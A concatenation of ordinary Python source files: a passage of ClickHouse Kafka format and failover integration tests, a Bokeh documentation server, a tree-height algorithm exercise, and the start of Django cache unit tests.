5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
topic_name_prefix = 'format_tests_4_stream_'
for format_name, format_opts in list(all_formats.items()):
logging.debug(f'Set up {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
if format_opts.get('printable', False) == False:
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
extra_settings=format_opts.get('extra_settings') or ''))
for format_name, format_opts in list(all_formats.items()):
logging.debug('Checking {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name))
errors_expected = format_opts['expected']
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result.strip() == errors_expected.strip(), 'Proper errors for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
def wait_for_new_data(table_name, prev_count = 0, max_retries = 120):
retries = 0
while True:
new_count = int(instance.query("SELECT count() FROM {}".format(table_name)))
print(new_count)
if new_count > prev_count:
return new_count
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception("No new data :(")
def test_kafka_consumer_failover(kafka_cluster):
# for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "kafka_consumer_failover"
kafka_create_topic(admin_client, topic_name, num_partitions=2)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka3 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.kafka_mv TO test.destination AS
SELECT key, value, 'kafka' as _consumed_by
FROM test.kafka;
CREATE MATERIALIZED VIEW test.kafka2_mv TO test.destination AS
SELECT key, value, 'kafka2' as _consumed_by
FROM test.kafka2;
CREATE MATERIALIZED VIEW test.kafka3_mv TO test.destination AS
SELECT key, value, 'kafka3' as _consumed_by
FROM test.kafka3;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
## all 3 attached, 2 working
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination')
## 2 attached, 2 working
instance.query('DETACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 3 attached, 2 working
instance.query('ATTACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, same 2 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
kafka_delete_topic(admin_client, topic_name)
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
docserver.py
|
from __future__ import print_function
import flask
import os
import threading
import time
import webbrowser
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
_basedir = os.path.join("..", os.path.dirname(__file__))
app = flask.Flask(__name__, static_path="/unused")
PORT=5009
http_server = HTTPServer(WSGIContainer(app))
@app.route('/')
def welcome():
return """
<h1>Welcome to the Bokeh documentation server</h1>
You probably want to go to <a href="/en/latest/index.html"> Index</a>
"""
@app.route('/en/latest/<path:filename>')
def send_pic(filename):
return flask.send_from_directory(
os.path.join(_basedir,"sphinx/_build/html/"), filename)
@app.route('/scripts/<path:filename>')
def send_script(filename):
return flask.send_from_directory(
os.path.join(_basedir,"sphinx/_build/html/scripts/"), filename)
def open_browser():
# Child process
time.sleep(0.5)
webbrowser.open("http://localhost:%d/en/latest/index.html" % PORT, new="tab")
data = {}
def serve_http():
data['ioloop'] = IOLoop()
http_server.listen(PORT)
IOLoop.instance().start()
def shutdown_server():
ioloop = data['ioloop']
ioloop.add_callback(ioloop.stop)
print("Asked Server to shut down.")
def ui():
try:
time.sleep(0.5)
input("Press <ENTER> to exit...\n")
except:
pass
if __name__ == "__main__":
print("\nStarting Bokeh plot server on port %d..." % PORT)
print("Visit http://localhost:%d/en/latest/index.html to see plots\n" % PORT)
t_server = threading.Thread(target=serve_http)
t_server.start()
t_browser = threading.Thread(target=open_browser)
t_browser.start()
ui()
shutdown_server()
t_server.join()
t_browser.join()
print("Server shut down.")
|
tree-height.py
|
# python3
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeHeight:
def read(self):
self.n = int(sys.stdin.readline())
self.parent = list(map(int, sys.stdin.readline().split()))
def compute_height(self):
maxHeight = 0;
heights = [0] * len(self.parent)
for vertex in range(self.n):
if (heights[vertex] != 0):
continue
height = 0
i = vertex
while i != -1:
if (heights[i] != 0):
height += heights[i]
break
height += 1
i = self.parent[i]
maxHeight = max(maxHeight, height)
i = vertex
while i != -1:
if (heights[i] != 0):
break
heights[i] = height
height -= 1
i = self.parent[i]
return maxHeight
# def compute_height(self):
# # Replace this code with a faster implementation
# maxHeight = 0
# for vertex in range(self.n):
# height = 0
# i = vertex
# while i != -1:
# height += 1
# i = self.parent[i]
# maxHeight = max(maxHeight, height);
# return maxHeight;
def main():
tree = TreeHeight()
tree.read()
print(tree.compute_height())
threading.Thread(target=main).start()
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import connection, connections
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable(object):
def __getstate__(self):
raise pickle.PickleError()
class UnpicklableType(object):
# Unpicklable using the default pickling protocol on Python 2.
__slots__ = 'a',
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
